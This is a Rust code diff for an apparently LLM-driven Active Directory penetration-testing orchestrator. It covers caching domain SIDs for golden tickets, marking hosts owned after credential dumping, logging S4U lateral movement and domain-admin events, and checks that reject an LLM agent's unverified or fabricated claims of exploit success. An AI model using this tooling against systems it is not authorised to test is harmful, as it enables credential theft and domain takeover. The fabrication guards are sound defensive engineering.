+ None => return, + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { let state = dispatcher.state.read().await; - state + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) + .insert(domain.clone(), sid.clone()); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) }; - if !already_cached { + if !already_known { let op_id = { let state = dispatcher.state.read().await; state.operation_id.clone() }; let reader = ares_core::state::RedisStateReader::new(op_id); let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); dispatcher .state .write() .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } + .admin_names + .insert(domain, admin_name); } } } @@ -354,8 +508,81 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A #[cfg(test)] mod tests { use super::*; + use ares_core::models::TrustInfo; use serde_json::json; + fn make_trust(domain: &str, flat: &str) -> TrustInfo { + TrustInfo { + domain: domain.to_string(), + flat_name: flat.to_string(), + direction: "bidirectional".to_string(), + trust_type: "forest".to_string(), + sid_filtering: true, + } + } + + // -- resolve_flat_to_fqdn ----------------------------------------------- + + #[test] + fn resolve_flat_uses_trusted_domain_metadata() { + let mut state = StateInner::new("op-test".into()); + state.trusted_domains.insert( + "fabrikam.local".into(), + make_trust("fabrikam.local", "FABRIKAM"), + ); + assert_eq!( + resolve_flat_to_fqdn("FABRIKAM", &state).as_deref(), + Some("fabrikam.local") + ); + } + + #[test] + fn resolve_flat_falls_back_to_primary_domain_label() { + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + Some("contoso.local") + ); + } + + #[test] + fn resolve_flat_unknown_returns_none() { + let state = StateInner::new("op-test".into()); + assert_eq!(resolve_flat_to_fqdn("UNKNOWN", &state), None); + } + + #[test] + fn resolve_flat_does_not_match_host_short_name() { + // netbios_to_fqdn maps DC02 → dc02.contoso.local (a host, not domain). + // resolve_flat_to_fqdn must reject this — dc02.contoso.local is not in + // state.domains, so it cannot be a domain FQDN. + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + state + .netbios_to_fqdn + .insert("DC02".into(), "dc02.contoso.local".into()); + assert_eq!(resolve_flat_to_fqdn("DC02", &state), None); + } + + #[test] + fn resolve_flat_prefers_trust_metadata_over_primary_label() { + // Both north.sevenkingdoms.local and sevenkingdoms.local are known. + // Flat "SEVENKINGDOMS" should resolve to the parent FQDN even when + // both could plausibly match by first-label heuristic. + let mut state = StateInner::new("op-test".into()); + state.domains.push("north.sevenkingdoms.local".into()); + state.domains.push("sevenkingdoms.local".into()); + state.trusted_domains.insert( + "sevenkingdoms.local".into(), + make_trust("sevenkingdoms.local", "SEVENKINGDOMS"), + ); + assert_eq!( + resolve_flat_to_fqdn("SEVENKINGDOMS", &state).as_deref(), + Some("sevenkingdoms.local") + ); + } + // -- resolve_da_path ---------------------------------------------------- #[test] diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs index 9dd932e6..69c2fbdd 100644 --- a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -145,7 +145,16 @@ async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { } "user" => { if let Ok(user) = serde_json::from_value::(data.clone()) { - if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { + if [ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ] + .contains(&user.source.as_str()) + { let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs index 730a9815..6a7bac63 100644 --- a/ares-cli/src/orchestrator/result_processing/mod.rs +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -34,7 +34,10 @@ use self::admin_checks::{ }; use self::discovery_polling::has_lockout_in_result; use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; +use self::timeline::{ + create_credential_timeline_event, create_exploitation_timeline_event, + create_hash_timeline_event, create_lateral_movement_timeline_event, +}; /// Kerberos/SMB errors that indicate a credential is locked out. pub(crate) const LOCKOUT_PATTERNS: &[&str] = @@ -50,7 +53,7 @@ pub async fn process_completed_task( let result = &completed.result; // Extract task-level metadata from pending_tasks before complete_task removes it. - let (cred_key, task_domain) = { + let (cred_key, task_domain, task_target_ip) = { let state = dispatcher.state.read().await; let task = state.pending_tasks.get(task_id.as_str()); let ck = task @@ -61,7 +64,11 @@ pub async fn process_completed_task( .and_then(|t| t.params.get("domain")) .and_then(|v| v.as_str()) .map(|s| s.to_string()); - (ck, td) + let tip = task + .and_then(|t| t.params.get("target_ip")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + (ck, td, tip) }; { @@ -115,11 +122,37 @@ pub async fn process_completed_task( let default_domain = if let Some(ref td) = task_domain { td.clone() } else { - get_default_domain(dispatcher).await + // Resolve domain from the task's target IP (e.g. secretsdump against a + // specific DC). Falls back to state.domains.first() only as last resort. + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await }; extract_from_raw_text(payload, dispatcher, &default_domain).await; } + // Mark host as owned when a credential_access task succeeds AND parser + // evidence proves credentials/hashes were extracted. The LLM's + // `task_complete(success=true)` is not sufficient on its own — without + // parser-grounded credential evidence we treat the claim as unverified + // and skip the state write. + if result.success { + if let Some(ref ip) = task_target_ip { + if task_id.starts_with("credential_access_") + && result_has_credential_evidence(&result.result) + { + let _ = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await; + } else if task_id.starts_with("credential_access_") { + debug!( + task_id = %task_id, + ip = %ip, + "Skipping mark_host_owned: no parser-extracted credential/hash evidence" + ); + } + } + } + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). // Caches the SID for golden ticket generation without needing lookupsid. if let Some(ref payload) = result.result { @@ -140,27 +173,61 @@ pub async fn process_completed_task( } } - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() + // Handle exploit task outcomes — create timeline events for both success and failure + if completed.task_id.starts_with("exploit_") { + if let Some(vuln_id) = result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + // Guard: LLM may call task_complete (success=true) with a result + // that actually describes a failure. Don't mark as exploited if the + // result summary contains clear failure indicators OR if no parser + // evidence (discoveries from real tool stdout) corroborates the + // exploit. The text heuristic catches obvious lies; the parser + // check catches silent fabrication. + let actually_succeeded = result.success + && !result_text_indicates_failure(&result.result) + && result_has_parser_evidence(&result.result); + + if actually_succeeded { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + create_exploitation_timeline_event(dispatcher, &vuln_id, task_id).await; + } else { + // Record failed exploit attempts as timeline events so they appear + // in reports (e.g. noPac patched, PrintNightmare patched, Certifried + // tool missing). This closes the "dispatched but no report evidence" gap. + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + let event_id = format!( + "evt-exploit-fail-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploit_failed", + "description": format!("Exploit attempted but failed: {vuln_id} — {err_msg}"), + "mitre_techniques": ["T1210"], + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &["T1210".to_string()]) + .await; + info!( + vuln_id = %vuln_id, + task_id = %task_id, + err = err_msg, + "Exploit failure recorded as timeline event" + ); } } } @@ -188,9 +255,113 @@ pub async fn process_completed_task( let _ = dispatcher.notify_state_update().await; } -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc) -> String { +/// Return true if the task result carries any parser-extracted discoveries. +/// "Parser-extracted" means populated by ares-tools parsers running on real +/// tool stdout — never LLM-fabricated. Used to ground state writes (e.g. +/// `mark_exploited`) against actual evidence. +fn result_has_parser_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + const KEYS: &[&str] = &[ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ]; + KEYS.iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Return true if the task produced parser-extracted credential or hash +/// evidence — the grounding signal for `mark_host_owned` on +/// `credential_access_*` tasks. +fn result_has_credential_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + ["credentials", "hashes"].iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Check whether a task result's text indicates the LLM reported a failure, +/// even though the task technically completed (task_complete was called). +fn result_text_indicates_failure(result: &Option) -> bool { + let text = match result { + Some(v) => { + // Check both "summary" field and full JSON string + let summary = v.get("summary").and_then(|s| s.as_str()).unwrap_or(""); + if !summary.is_empty() { + summary.to_string() + } else { + v.to_string() + } + } + None => return false, + }; + let lower = text.to_lowercase(); + lower.starts_with("failed") + || lower.contains("\"failed:") + || lower.contains("\"failed ") + || lower.contains("failed to exploit") + || lower.contains("failed esc") + || lower.contains("missing required") + || lower.contains("missing ca") + || lower.contains("without ca name") + || lower.contains("cannot attempt") + || lower.contains("cannot execute") + || lower.contains("not available in") + || lower.contains("ept_s_not_registered") + || lower.contains("blocked:") + || lower.contains("invalidcredentials") + || lower.contains("status_account_locked") + || lower.contains("rpc_s_access_denied") +} + +/// Resolve the domain for hash/credential attribution from the task's target IP. +/// +/// Priority: +/// 1. Match target_ip to a known host's domain (hostname suffix → domain) +/// 2. Match target_ip to a domain controller entry +/// 3. Fall back to state.domains.first() +async fn resolve_domain_from_ip(dispatcher: &Arc, target_ip: Option<&str>) -> String { let state = dispatcher.state.read().await; + if let Some(ip) = target_ip { + // Check domain_controllers map first — most reliable + for (domain, dc_ip) in &state.domain_controllers { + if dc_ip == ip { + return domain.clone(); + } + } + // Derive domain from FQDN hostname (e.g. dc01.child.contoso.local + // → child.contoso.local) + for host in &state.hosts { + if host.ip == ip { + if let Some(dot) = host.hostname.find('.') { + return host.hostname[dot + 1..].to_string(); + } + } + } + } state.domains.first().cloned().unwrap_or_default() } @@ -326,6 +497,7 @@ async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc {} Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), @@ -389,9 +561,11 @@ async fn extract_from_raw_text( for cred in extracted.credentials { let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; match dispatcher .state .publish_credential(&dispatcher.queue, cred) @@ -399,6 +573,8 @@ async fn extract_from_raw_text( { Ok(true) => { new_count += 1; + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; // When a cracked credential is published, update the corresponding // hash's cracked_password field in state and Redis. if is_cracked { @@ -406,9 +582,9 @@ async fn extract_from_raw_text( .state .update_hash_cracked_password( &dispatcher.queue, - &cracked_username, - &cracked_domain, - &cracked_password, + &username, + &domain, + &password, ) .await; } @@ -419,8 +595,24 @@ async fn extract_from_raw_text( } for hash in extracted.hashes { + let username = hash.username.clone(); + let domain = hash.domain.clone(); + let hash_type = hash.hash_type.clone(); + let hash_value = hash.hash_value.clone(); + let source = hash.source.clone(); match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => new_count += 1, + Ok(true) => { + new_count += 1; + create_hash_timeline_event( + dispatcher, + &username, + &domain, + &hash_type, + &hash_value, + &source, + ) + .await; + } Ok(false) => {} Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), } diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs index 8a0d1c1b..27dc43d4 100644 --- a/ares-cli/src/orchestrator/result_processing/parsing.rs +++ b/ares-cli/src/orchestrator/result_processing/parsing.rs @@ -107,7 +107,14 @@ pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { } } // Users -- defense-in-depth: only accept entries with a parser-verified source. - const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; + const TRUSTED_USER_SOURCES: &[&str] = &[ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ]; if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { for user_val in users { if let Ok(user) = serde_json::from_value::(user_val.clone()) { diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs index 42e46699..25e8ac21 100644 --- a/ares-cli/src/orchestrator/result_processing/tests.rs +++ b/ares-cli/src/orchestrator/result_processing/tests.rs @@ -3,9 +3,84 @@ use super::admin_checks::{ }; use super::parsing::{has_domain_admin_indicator, parse_discoveries, resolve_parent_id}; use super::timeline::{credential_techniques, hash_techniques, is_critical_hash}; +use super::{result_has_credential_evidence, result_has_parser_evidence}; use ares_core::models::{Credential, Hash}; use serde_json::json; +#[test] +fn parser_evidence_requires_discoveries_key() { + // No payload at all → no evidence + assert!(!result_has_parser_evidence(&None)); + // Payload without discoveries → no evidence + assert!(!result_has_parser_evidence(&Some(json!({"summary": "ok"})))); + // Empty discoveries object → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {}}) + ))); + // Empty arrays → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {"credentials": [], "hashes": []}}) + ))); +} + +#[test] +fn parser_evidence_accepts_any_populated_array() { + for key in [ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ] { + let payload = json!({"discoveries": {key: [{"placeholder": true}]}}); + assert!( + result_has_parser_evidence(&Some(payload)), + "key {key} should count as parser evidence" + ); + } +} + +#[test] +fn credential_evidence_only_credentials_or_hashes() { + // Only hosts → not credential evidence + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"hosts": [{"ip": "192.168.58.10"}]}}) + ))); + // Credentials present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"credentials": [{"username": "admin"}]}}) + ))); + // Hashes present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"hashes": [{"username": "admin"}]}}) + ))); + // Vulnerabilities alone are NOT credential evidence (would be parser evidence) + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"vulnerabilities": [{"vuln_id": "v1"}]}}) + ))); +} + +#[test] +fn llm_findings_field_is_not_treated_as_evidence() { + // LLM-fabricated findings live under `llm_findings`, never `discoveries`. + // The grounding check must IGNORE them. + let payload = json!({ + "summary": "claimed exploit success", + "llm_findings": [{ + "vulnerabilities": [{ + "vuln_id": "finding_kerberoastable_account_192_168_58_10", + "vuln_type": "kerberoastable_account", + }] + }] + }); + assert!(!result_has_parser_evidence(&Some(payload.clone()))); + assert!(!result_has_credential_evidence(&Some(payload))); +} + #[test] fn parse_credentials_array() { let payload = json!({ @@ -669,6 +744,8 @@ fn parse_shares_with_comment() { assert_eq!(parsed.shares[0].comment, "Logon server share"); } +// --- parse_pwned_line tests --- + #[test] fn pwned_line_standard_format() { let line = "[+] CONTOSO\\admin:P@ssw0rd! (Pwn3d!)"; @@ -745,6 +822,8 @@ fn pwned_line_username_with_special_chars() { ); } +// --- extract_ip_from_line tests --- + #[test] fn extract_ip_basic() { let line = "SMB 192.168.58.10 445 DC01 [+] CONTOSO\\admin (Pwn3d!)"; @@ -789,6 +868,8 @@ fn extract_ip_boundary_values() { assert_eq!(extract_ip_from_line(line), Some("0.0.0.0".to_string())); } +// --- has_golden_ticket_indicator tests --- + #[test] fn golden_ticket_indicator_present() { let text = "Saving ticket in administrator.ccache"; @@ -818,6 +899,8 @@ fn golden_ticket_indicator_both_present_not_adjacent() { assert!(has_golden_ticket_indicator(text)); } +// --- resolve_da_path tests --- + #[test] fn da_path_explicit_flag_with_path() { let payload = json!({ @@ -863,6 +946,8 @@ fn da_path_null_flag_defaults_to_krbtgt() { ); } +// --- credential_techniques tests --- + #[test] fn credential_techniques_admin_base() { let t = credential_techniques("manual", true); @@ -920,6 +1005,8 @@ fn credential_techniques_empty_source() { assert_eq!(t, vec!["T1552"]); } +// --- hash_techniques tests --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -1005,6 +1092,8 @@ fn hash_techniques_as_rep_hyphenated_source() { assert!(t.contains(&"T1558.004".to_string())); } +// --- is_critical_hash tests --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs index 6231da75..843bc370 100644 --- a/ares-cli/src/orchestrator/result_processing/timeline.rs +++ b/ares-cli/src/orchestrator/result_processing/timeline.rs @@ -115,10 +115,140 @@ pub(crate) async fn create_hash_timeline_event( .await; } +/// Emit a timeline event when a credential is upgraded to admin (Pwn3d! detected). +pub(crate) async fn create_admin_upgrade_timeline_event( + dispatcher: &Arc, + username: &str, + domain: &str, +) { + let techniques = vec!["T1078".to_string()]; // Valid Accounts + let event_id = format!( + "evt-admin-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "admin_upgrade", + "description": format!("Admin access confirmed: {domain}\\{username} (Pwn3d!)"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when a vulnerability is exploited. +pub(crate) async fn create_exploitation_timeline_event( + dispatcher: &Arc, + vuln_id: &str, + task_id: &str, +) { + let techniques = exploitation_techniques(vuln_id); + let event_id = format!( + "evt-exploit-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploitation", + "description": format!("Vulnerability exploited: {vuln_id} (task {task_id})"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event for lateral movement via S4U/delegation. +pub(crate) async fn create_lateral_movement_timeline_event( + dispatcher: &Arc, + target: &str, + _ticket_path: &str, +) { + let techniques = vec![ + "T1550.003".to_string(), // Use Alternate Authentication Material: Pass the Ticket + "T1021".to_string(), // Remote Services + ]; + let event_id = format!( + "evt-lateral-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "s4u_lateral_movement", + "description": format!("Lateral movement via S4U delegation to {target}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when Domain Admin is achieved. +pub(crate) async fn create_domain_admin_timeline_event( + dispatcher: &Arc, + domain: &str, + path: Option<&str>, +) { + let techniques = vec![ + "T1003.006".to_string(), // OS Credential Dumping: DCSync + "T1078.002".to_string(), // Valid Accounts: Domain Accounts + ]; + let event_id = format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let description = match path { + Some(p) => format!("CRITICAL: Domain Admin achieved for {domain} via {p}"), + None => format!("CRITICAL: Domain Admin achieved for {domain}"), + }; + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": description, + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Map vulnerability IDs to MITRE ATT&CK technique IDs. +fn exploitation_techniques(vuln_id: &str) -> Vec { + let vuln_lower = vuln_id.to_lowercase(); + let mut techniques = vec!["T1210".to_string()]; // Exploitation of Remote Services (base) + if vuln_lower.contains("constrained_delegation") { + techniques.push("T1558.003".to_string()); // Kerberoasting (S4U) + } + if vuln_lower.contains("unconstrained_delegation") { + techniques.push("T1558".to_string()); // Steal or Forge Kerberos Tickets + } + if vuln_lower.contains("mssql") { + techniques.push("T1505".to_string()); // Server Software Component + } + if vuln_lower.contains("esc1") || vuln_lower.contains("esc4") || vuln_lower.contains("esc8") { + techniques.push("T1649".to_string()); // Steal or Forge Authentication Certificates + } + if vuln_lower.contains("rbcd") { + techniques.push("T1134.001".to_string()); // Access Token Manipulation: Token Impersonation + } + if vuln_lower.contains("smb_signing") { + techniques.push("T1557.001".to_string()); // LLMNR/NBT-NS Poisoning (relay) + } + techniques +} + #[cfg(test)] mod tests { use super::*; + // --- credential_techniques --- + #[test] fn credential_techniques_admin() { let t = credential_techniques("nxc-smb", true); @@ -170,6 +300,8 @@ mod tests { assert!(t.contains(&"T1558.003".to_string())); } + // --- hash_techniques --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -236,6 +368,8 @@ mod tests { assert!(!t.contains(&"T1003.006".to_string())); } + // --- is_critical_hash --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); @@ -250,4 +384,54 @@ mod tests { fn critical_hash_regular_user() { assert!(!is_critical_hash("jsmith")); } + + // --- exploitation_techniques --- + + #[test] + fn exploitation_techniques_base() { + let t = exploitation_techniques("some_vuln"); + assert!(t.contains(&"T1210".to_string())); + } + + #[test] + fn exploitation_techniques_constrained_delegation() { + let t = exploitation_techniques("constrained_delegation_dc01"); + assert!(t.contains(&"T1558.003".to_string())); + } + + #[test] + fn exploitation_techniques_mssql() { + let t = exploitation_techniques("mssql_impersonation_sql01"); + assert!(t.contains(&"T1505".to_string())); + } + + #[test] + fn exploitation_techniques_esc1() { + let t = exploitation_techniques("esc1_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_esc4() { + let t = exploitation_techniques("esc4_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_rbcd() { + let t = exploitation_techniques("rbcd_dc01"); + assert!(t.contains(&"T1134.001".to_string())); + } + + #[test] + fn exploitation_techniques_smb_signing() { + let t = exploitation_techniques("smb_signing_disabled_192.168.58.10"); + assert!(t.contains(&"T1557.001".to_string())); + } + + #[test] + fn exploitation_techniques_unconstrained() { + let t = exploitation_techniques("unconstrained_delegation_ws01"); + assert!(t.contains(&"T1558".to_string())); + } } diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs index 7f450c3c..ca110f90 100644 --- a/ares-cli/src/orchestrator/routing.rs +++ b/ares-cli/src/orchestrator/routing.rs @@ -81,7 +81,6 @@ impl ActiveTaskTracker { } /// Total active tasks across all roles. - #[cfg(test)] pub async fn total(&self) -> usize { let inner = self.inner.lock().await; inner.tasks.len() diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs index bf3cd920..6d9605f6 100644 --- a/ares-cli/src/orchestrator/state/dedup.rs +++ b/ares-cli/src/orchestrator/state/dedup.rs @@ -60,6 +60,30 @@ impl SharedState { Ok(()) } + /// Remove a dedup set entry from Redis (used to allow retries after a + /// transient failure such as auth-mismatch on enumeration). + pub async fn unpersist_dedup( + &self, + queue: &TaskQueueCore, + set_name: &str, + key: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, key).await?; + Ok(()) + } + /// Persist MSSQL enum dispatched entry to Redis. pub async fn persist_mssql_dispatched( &self, @@ -81,6 +105,29 @@ impl SharedState { let _: () = conn.expire(&redis_key, 86400).await?; Ok(()) } + + /// Remove an MSSQL enum dispatched entry from Redis so the next + /// `auto_mssql_detection` tick can re-publish a vuln for that host. + #[allow(dead_code)] + pub async fn unpersist_mssql_dispatched( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, ip).await?; + Ok(()) + } } #[cfg(test)] diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs index 552c0aec..43ca86d5 100644 --- a/ares-cli/src/orchestrator/state/inner.rs +++ b/ares-cli/src/orchestrator/state/inner.rs @@ -71,10 +71,14 @@ pub struct StateInner { // Completion flag (set externally to signal operation should wrap up) pub completed: bool, + + /// Timestamp when all forests were first detected as dominated. + /// Used by the completion monitor to enforce a post-exploitation grace period. + pub all_forests_dominated_at: Option, } impl StateInner { - pub(super) fn new(operation_id: String) -> Self { + pub(crate) fn new(operation_id: String) -> Self { let mut dedup = HashMap::new(); for name in ALL_DEDUP_SETS { dedup.insert(name.to_string(), HashSet::new()); @@ -109,6 +113,7 @@ impl StateInner { completed_tasks: HashMap::new(), quarantined_credentials: HashMap::new(), completed: false, + all_forests_dominated_at: None, } } @@ -149,6 +154,287 @@ impl StateInner { self.quarantined_credentials.insert(key, expiry); } + /// Resolve the DC IP for a domain. + /// + /// Checks `domain_controllers` first, then falls back to scanning the hosts + /// list for a DC whose FQDN suffix matches the domain. This is more robust + /// than relying solely on `domain_controllers`, which can have stale or + /// missing entries due to startup seed timing issues in multi-domain + /// environments. + pub fn resolve_dc_ip(&self, domain: &str) -> Option { + let domain_lower = domain.to_lowercase(); + // Tier 1: explicit DC map (case-insensitive) + if let Some(ip) = self.domain_controllers.get(&domain_lower).or_else(|| { + self.domain_controllers + .iter() + .find(|(k, _)| k.to_lowercase() == domain_lower) + .map(|(_, v)| v) + }) { + return Some(ip.clone()); + } + // Tier 2: scan hosts for a DC matching this domain by FQDN suffix + for host in &self.hosts { + if !(host.is_dc || host.detect_dc()) { + continue; + } + if host.hostname.is_empty() { + continue; + } + let parts: Vec<&str> = host.hostname.split('.').collect(); + if parts.len() >= 3 { + let host_domain = parts[1..].join(".").to_lowercase(); + if host_domain == domain_lower { + return Some(host.ip.clone()); + } + } + } + None + } + + /// Return all unique domains that have a resolvable DC. + /// + /// Merges domains from `domain_controllers`, `domains`, and `trusted_domains` + /// then filters to those where `resolve_dc_ip()` succeeds. Returns + /// `(domain, dc_ip)` pairs. + pub fn all_domains_with_dcs(&self) -> Vec<(String, String)> { + let mut seen = std::collections::HashSet::new(); + let mut result = Vec::new(); + + // Gather all known domain names (lowercased for dedup) + let mut all_domains: Vec = Vec::new(); + for d in self.domain_controllers.keys() { + all_domains.push(d.to_lowercase()); + } + for d in &self.domains { + all_domains.push(d.to_lowercase()); + } + for d in self.trusted_domains.keys() { + all_domains.push(d.to_lowercase()); + } + + for domain in all_domains { + if seen.contains(&domain) { + continue; + } + 